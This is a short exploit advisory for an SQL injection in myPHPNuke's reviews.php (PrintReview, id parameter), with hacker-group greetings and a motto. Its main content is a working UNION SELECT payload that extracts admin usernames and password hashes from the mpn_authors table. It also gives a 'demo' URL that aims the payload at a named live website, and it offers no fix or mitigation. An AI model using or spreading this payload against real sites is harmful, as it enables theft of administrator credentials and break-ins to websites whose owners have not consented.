############################################################# 
# myPHPNuke  (PrintReview) SQL Injection Vulnerability 
    
# Author: Gamoscu 
  
# Site: www.1923turk.com 
  
# Blog: http://gamoscu.wordpress.com/ 
    
############################################################## 
    
   
# Exploit: xxxxx/xxx/reviews.php?op=PrintReview&id=[SQL-inj] 
  
  
#    -1+union+select+1,concat_ws(0x3a3a,aid,pwd),3,4,5,6,7,8,9+from+mpn_authors--
      
             
           
  
# Demo: http://www.yahha.com/reviews.php?op=PrintReview&id=-1+union+select+1,concat_ws(0x3a3a,aid,pwd),3,4,5,6,7,8,9+from+mpn_authors--
  
   
############################################################## 
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO 
############################################################## 
  
  
Vatan Lafla Degil Eylemle Sevilir